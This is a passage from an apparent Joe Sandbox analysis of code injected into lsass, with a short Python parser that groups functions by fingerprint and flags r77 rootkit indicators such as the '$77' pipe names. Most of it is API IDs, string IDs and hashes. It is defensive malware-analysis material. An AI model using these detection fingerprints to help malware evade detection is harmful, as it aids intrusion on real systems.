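    at two bases of one process (csm at 0x213BDCB0000 and 0x213BDCE0000 in lsass
    above) means the code sits in two regions, e.g. a staging buffer and the image."""
    out = defaultdict(set)
    for r in records:
        if fp := r.fields.get("API String ID"):
            out[fp].add((r.process, r.image_base))
    return {fp: sorted(v) for fp, v in out.items()}


def r77_indicators(records):
    r"""Functions whose strings carry the $77 prefix. Joe Sandbox joins several
    strings with '$' (csm$csm$csm), so splitting on '$' would cut
    \\.\pipe\$77childproc into '\\.\pipe\' and '77childproc'; match the raw value."""
    return [(r.process, hex(r.image_base), r.fields["String ID"], r.fields.get("API ID", ""))
            for r in records if R77_PREFIX in r.fields.get("String ID", "")]


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    print({fp: p for fp, p in functions_by_fingerprint(recs).items() if len(p) > 1})
    print(r77_indicators(recs))
```

The $77 test deliberately matches the raw String ID value rather than the split list: Joe Sandbox uses '$' as its own separator, so a naive split would turn the pipe name into '\\.\pipe\' and '77childproc' and lose the indicator. On a full report export, run parse_records over the whole text; the Control-flow Graph edge lists and the Executed/Not Executed legend carry no "Key: value" bullets and are skipped.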
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
• Associated: 0000000A.00000002.2828989527.00000213BDCE0000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2830008200.00000213BDCF5000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2830432169.00000213BDD00000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2830892666.00000213BDD02000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2831361183.00000213BDD09000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                  • String ID: CONOUT$
                                                                                                                                  • API String ID: 3230265001-3130406586
                                                                                                                                  • Opcode ID: fded8b1aecb2581e15f9b2fea19fc72bf1e32290e5d4210063707ee5cfc109ba
                                                                                                                                  • Instruction ID: 331ab3ca0ef663983298ce67873e33f52ce695d8b1efebd71c3a598c95dc751e
                                                                                                                                  • Opcode Fuzzy Hash: fded8b1aecb2581e15f9b2fea19fc72bf1e32290e5d4210063707ee5cfc109ba
                                                                                                                                  • Instruction Fuzzy Hash: 89118931318A4086EB51CB56F8687D966A1F7A8FECF044224DB5D4B798EF39CB488744
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
• Associated: 0000000A.00000002.2828989527.00000213BDCE0000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2830008200.00000213BDCF5000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2830432169.00000213BDD00000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2830892666.00000213BDD02000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2831361183.00000213BDD09000.00000002.00000001.00020000.00000000.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                                                                                  • String ID: wr
                                                                                                                                  • API String ID: 1092925422-2678910430
                                                                                                                                  • Opcode ID: 570c46f7119da87072e243a34acf534bc10630e2aaaf80423ed29c95a4165983
                                                                                                                                  • Instruction ID: 5b4ad10cd0dc433e41f55fd6327e5eb677fe9a2a91a14cd81998f784656447ff
                                                                                                                                  • Opcode Fuzzy Hash: 570c46f7119da87072e243a34acf534bc10630e2aaaf80423ed29c95a4165983
                                                                                                                                  • Instruction Fuzzy Hash: C0115A76318B4083EF14DB21E4086A966A2FB58B8DF050425DE8D0B758FE3EDB488700
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2828989527.00000213BDCE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830008200.00000213BDCF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830432169.00000213BDD00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830892666.00000213BDD02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2831361183.00000213BDD09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Thread$Current$Context
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1666949209-0
                                                                                                                                  • Opcode ID: 51c1995138fd7319943032f34732079ccf3b7c8e074de6032c9de460bc6c2048
                                                                                                                                  • Instruction ID: 5ed66f8a6edf6f1cbbc991e688c0fab68562894523715429cec8b38c5a0caaa2
                                                                                                                                  • Opcode Fuzzy Hash: 51c1995138fd7319943032f34732079ccf3b7c8e074de6032c9de460bc6c2048
                                                                                                                                  • Instruction Fuzzy Hash: 22D19D76218B8882DA70DB16E49839A77A1F7D8B8CF100626EACD477A5DF3DD751CB00
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2828989527.00000213BDCE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830008200.00000213BDCF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830432169.00000213BDD00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830892666.00000213BDD02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2831361183.00000213BDD09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$Process$AllocFree
                                                                                                                                  • String ID: $77
                                                                                                                                  • API String ID: 756756679-3904844309
                                                                                                                                  • Opcode ID: 1e42b4eb9d42f81381c64a3d74f03da4ea8879049cfc088f291ee4777e03c39f
                                                                                                                                  • Instruction ID: 71a4031cfc771cdeeb36dfc57045659458c0ed6ff9048a24184771493a200819
                                                                                                                                  • Opcode Fuzzy Hash: 1e42b4eb9d42f81381c64a3d74f03da4ea8879049cfc088f291ee4777e03c39f
                                                                                                                                  • Instruction Fuzzy Hash: 4931A271309F5983EE11DF16E5482A96BA2BB64B8CF0841309F4847755FF36E7658700
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2828989527.00000213BDCE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830008200.00000213BDCF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830432169.00000213BDD00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830892666.00000213BDD02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2831361183.00000213BDD09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast$Value$FreeHeap
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 365477584-0
                                                                                                                                  • Opcode ID: fb8662b5dd4a7b4a14e2dc6b556187a738099e7f958ad9dbe67b7f6e291a754c
                                                                                                                                  • Instruction ID: c3da57012dbeac7d6f3951d7bfcf241053ca5e500fe65c64195d24b1a6eb9da0
                                                                                                                                  • Opcode Fuzzy Hash: fb8662b5dd4a7b4a14e2dc6b556187a738099e7f958ad9dbe67b7f6e291a754c
                                                                                                                                  • Instruction Fuzzy Hash: C0118FB471825843FE54E731A9693FD1143ABA4BDCF544534B92A476C7FE3AEB024740
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2828989527.00000213BDCE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830008200.00000213BDCF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830432169.00000213BDD00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830892666.00000213BDD02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2831361183.00000213BDD09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileNameProcess$CloseFindHandleImageOpenPathlstrlen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4193868204-0
                                                                                                                                  • Opcode ID: f83bca711875c45d170ae14931bd1c8e6e6adef336c538e2c5c6ee4da0c0b023
                                                                                                                                  • Instruction ID: fee0974e9b98ffa0f7d58d0626406c976e93cc59ed87b5827664c6d6ef0e8a3d
                                                                                                                                  • Opcode Fuzzy Hash: f83bca711875c45d170ae14931bd1c8e6e6adef336c538e2c5c6ee4da0c0b023
                                                                                                                                  • Instruction Fuzzy Hash: 8B016D71718B4482EE10DB12E8983D96AA2F758FC8F948434DE4A47758EE3ECB498740
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2828989527.00000213BDCE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830008200.00000213BDCF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830432169.00000213BDD00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830892666.00000213BDD02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2831361183.00000213BDD09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 449555515-0
                                                                                                                                  • Opcode ID: cb96bd636d75ef0150aa004f7367dade5eb8c58e0f15bd5ff47d86791bf19fa4
                                                                                                                                  • Instruction ID: 4c77b9602abdadd43deed9360ac1099c2b696b02b9733db4fcfb427980e6c576
                                                                                                                                  • Opcode Fuzzy Hash: cb96bd636d75ef0150aa004f7367dade5eb8c58e0f15bd5ff47d86791bf19fa4
                                                                                                                                  • Instruction Fuzzy Hash: 06015B74619B4482EF20DB22E81C79966A2EB68B8DF040128DE4D0A368FF3EC7588700
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2828989527.00000213BDCE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830008200.00000213BDCF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830432169.00000213BDD00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830892666.00000213BDD02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2831361183.00000213BDD09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CombinePath
                                                                                                                                  • String ID: \\.\pipe\
                                                                                                                                  • API String ID: 3422762182-91387939
                                                                                                                                  • Opcode ID: 546a660c3a3c5793cfedcc045940b0098f6ff5b56a36a36c93076b4998a23383
                                                                                                                                  • Instruction ID: ea8ae2e82c2f3dfea12a6639fe0a56ff0a22c0332726c452e499c2696bc0baaf
                                                                                                                                  • Opcode Fuzzy Hash: 546a660c3a3c5793cfedcc045940b0098f6ff5b56a36a36c93076b4998a23383
                                                                                                                                  • Instruction Fuzzy Hash: 56F089B4728B4082EE04CB17F9181D96A22AB58FCCF445430EE060B71DEE3DD74D8300
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2828989527.00000213BDCE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830008200.00000213BDCF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830432169.00000213BDD00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830892666.00000213BDD02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2831361183.00000213BDD09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                                  • Opcode ID: 22aa5c619ebc81d22d9dfbe7be1db06b78379459a7dd84903556244d0fd23091
                                                                                                                                  • Instruction ID: 777d784f27f14ac596d33ca955d28e521a71519ded58354678ba3666b47db94c
                                                                                                                                  • Opcode Fuzzy Hash: 22aa5c619ebc81d22d9dfbe7be1db06b78379459a7dd84903556244d0fd23091
                                                                                                                                  • Instruction Fuzzy Hash: E4F096B1218A0441EF14CB14E8483E91722EB9576CF5407299A6D495E8EF3EC74CC710
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2828989527.00000213BDCE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830008200.00000213BDCF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830432169.00000213BDD00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830892666.00000213BDD02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2831361183.00000213BDD09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2882836952-0
                                                                                                                                  • Opcode ID: 3aea7139df32369f879ece52c3062891ec0d21dfbcfe470f159ab8e5a177004e
                                                                                                                                  • Instruction ID: a96d3efd0bac3b26f44bcbcfe739f7d826db2238713155c3ec2d5104b93b9a38
                                                                                                                                  • Opcode Fuzzy Hash: 3aea7139df32369f879ece52c3062891ec0d21dfbcfe470f159ab8e5a177004e
                                                                                                                                  • Instruction Fuzzy Hash: 9102ED7611DB8486DB60CB55F49439ABBA1F3D4798F100025EACE87BA8EF7DDA54CB00
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                                                                  • Associated: 0000000A.00000002.2828989527.00000213BDCE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830008200.00000213BDCF5000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830432169.00000213BDD00000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2830892666.00000213BDD02000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000A.00000002.2831361183.00000213BDD09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2882836952-0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                  • String ID: csm
                                                                                                                                  • API String ID: 2395640692-1018135373
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CallEncodePointerTranslator
                                                                                                                                  • String ID: MOC$RCC
                                                                                                                                  • API String ID: 3544855599-2084237596
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                  • String ID: csm$csm
                                                                                                                                  • API String ID: 3896166516-3733052814
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000003.1465302178.00000213BDCB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCB0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_3_213bdcb0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                  • String ID: csm$csm
                                                                                                                                  • API String ID: 3896166516-3733052814
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileNameProcess$CloseFindHandleImageOpenPathlstrlen
                                                                                                                                  • String ID: pid_
                                                                                                                                  • API String ID: 4193868204-4147670505
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2718003287-0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$Process$Free
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3168794593-0
                                                                                                                                  APIs
                                                                                                                                  • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,00000213BDCF269F), ref: 00000213BDCF27D2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ConsoleMode
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4145635619-0
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2933794660-0
APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
• Associated: 0000000A.00000002.2828989527.00000213BDCE0000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2830008200.00000213BDCF5000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2830432169.00000213BDD00000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2830892666.00000213BDD02000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2831361183.00000213BDD09000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
Similarity
• API ID: FileType
• String ID: \\.\pipe\
• API String ID: 3081899298-91387939
APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000003.1465302178.00000213BDCB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCB0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_3_213bdcb0000_lsass.jbxd
Similarity
• API ID: CurrentImageNonwritable__except_validate_context_record
• String ID: csm
• API String ID: 3242871069-1018135373
APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000003.1465302178.00000213BDCB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000213BDCB0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_3_213bdcb0000_lsass.jbxd
Similarity
• API ID: CallTranslator
• String ID: MOC$RCC
• API String ID: 3163161869-2084237596
APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
• Associated: 0000000A.00000002.2828989527.00000213BDCE0000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2830008200.00000213BDCF5000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2830432169.00000213BDD00000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2830892666.00000213BDD02000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2831361183.00000213BDD09000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
Similarity
• API ID: ErrorFileLastWrite
• String ID: U
• API String ID: 442123175-4171548499
APIs
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
• Associated: 0000000A.00000002.2828989527.00000213BDCE0000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2830008200.00000213BDCF5000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2830432169.00000213BDD00000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2830892666.00000213BDD02000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2831361183.00000213BDD09000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
Similarity
• API ID: ExceptionFileHeaderRaise
• String ID: csm
• API String ID: 2573137834-1018135373
APIs
Memory Dump Source
• Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
• Associated: 0000000A.00000002.2828989527.00000213BDCE0000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2830008200.00000213BDCF5000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2830432169.00000213BDD00000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2830892666.00000213BDD02000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2831361183.00000213BDD09000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
Similarity
• API ID: Heap$Process$AllocFree
• String ID:
• API String ID: 756756679-0
APIs
Memory Dump Source
• Source File: 0000000A.00000002.2829525883.00000213BDCE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000213BDCE0000, based on PE: true
• Associated: 0000000A.00000002.2828989527.00000213BDCE0000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2830008200.00000213BDCF5000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2830432169.00000213BDD00000.00000004.00000001.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2830892666.00000213BDD02000.00000002.00000001.00020000.00000000.sdmp
• Associated: 0000000A.00000002.2831361183.00000213BDD09000.00000002.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_213bdce0000_lsass.jbxd
Similarity
• API ID: Heap$AllocProcess
• String ID:
• API String ID: 1617791916-0

Control-flow Graph

APIs
• GetModuleFileNameW.KERNEL32 ref: 00000158709D3805
• PathFindFileNameW.SHLWAPI ref: 00000158709D3814
  • Part of subcall function 00000158709D3D4C: StrCmpNIW.KERNELBASE(?,?,?,00000158709D2722), ref: 00000158709D3D64
  • Part of subcall function 00000158709D3C98: GetModuleHandleW.KERNEL32(?,?,?,?,?,00000158709D382B), ref: 00000158709D3CA6
  • Part of subcall function 00000158709D3C98: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000158709D382B), ref: 00000158709D3CD4
  • Part of subcall function 00000158709D3C98: VirtualProtectEx.KERNEL32(?,?,?,?,?,00000158709D382B), ref: 00000158709D3CF6
  • Part of subcall function 00000158709D3C98: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000158709D382B), ref: 00000158709D3D11
  • Part of subcall function 00000158709D3C98: VirtualProtectEx.KERNEL32(?,?,?,?,?,00000158709D382B), ref: 00000158709D3D32
